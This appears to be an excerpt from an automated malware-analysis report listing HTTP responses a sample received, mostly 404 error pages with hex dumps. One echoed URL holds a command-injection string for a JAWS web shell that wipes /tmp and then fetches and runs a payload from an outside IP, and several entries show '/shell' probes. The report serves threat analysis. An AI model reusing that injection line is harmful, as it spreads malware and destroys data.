Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:02:58 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Thu, 15 Jan 1970 20:16:03 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:10 GMTServer: Apache/2.4.51 (Raspbian)Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Raspbian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:10:10 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:13 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 10:50:27 GMTServer: cisco-IOSConnection: closeAccept-Ranges: noneData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 13:09:03 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:21:35 GMTServer: Apache/2.2.22 (Win32) mod_jk/1.2.37Content-Length: 1229Cache-Control: max-age=3600Expires: Mon, 01 Nov 2021 09:22:05 GMTVary: Accept-EncodingKeep-Alive: timeout=5, max=150Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 21 2d 2d 20 54 68 65 20 61 62 6f 76 65 20 33 20 6d 65 74 61 20 74 61 67 73 20 2a 6d 75 73 74 2a 20 63 6f 6d 65 20 66 69 72 73 74 20 69 6e 20 74 68 65 20 68 65 61 64 3b 20 61 6e 79 20 6f 74 68 65 72 20 68 65 61 64 20 63 6f 6e 74 65 6e 74 20 6d 75 73 74 20 63 6f 6d 65 20 2a 61 66 74 65 72 2a 20 74 68 65 73 65 20 74 61 67 73 20 2d 2d 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 50 61 67 65 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 66 6f 6e 74 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 43 75 73 74 6f 6d 20 73 74 6c 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 48 54 4d 4c 35 20 73 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 66 6f 72 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0d 0a 09 3c 21 2d 2d 20 57 41 52 4e 49 4e 47 3a 20 52 65 73 70 6f 6e 64 2e 6a 73 20 64 6f 65 73 6e 27 74 20 77 6f 72 6b 20 69 66 20 79 6f 75 20 76 69 65 77 20 74 68 65 20 70 61 67 65 20 76 69 61 20 66 69 6c 65 3a 2f 2f 20 2d 2d 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 09 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 72 65 73 70 6f 6e 64 2f 31 2e 34 2e 32 2f 72 65 73 70 6f 6e 64 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:10:17 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=euc-krDate: Mon, 01 Nov 2021 09:10:17 GMTLast-Modified: Mon, 01 Nov 2021 09:10:17 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>404 Not Found</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' was not found on this server.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:18 GMTServer: ApacheAccept-Ranges: bytesKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:14:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 1725Content-Type: text/html; charset=utf-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:21 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailable: Back-end server is at capacityContent-Length: 0Connection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.6.2Date: Mon, 01 Nov 2021 09:10:21 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.6.2</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheServer: WebServerContent-Type: text/htmlContent-Length: 345Date: Mon, 01 Nov 2021 09:10:21 GMTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
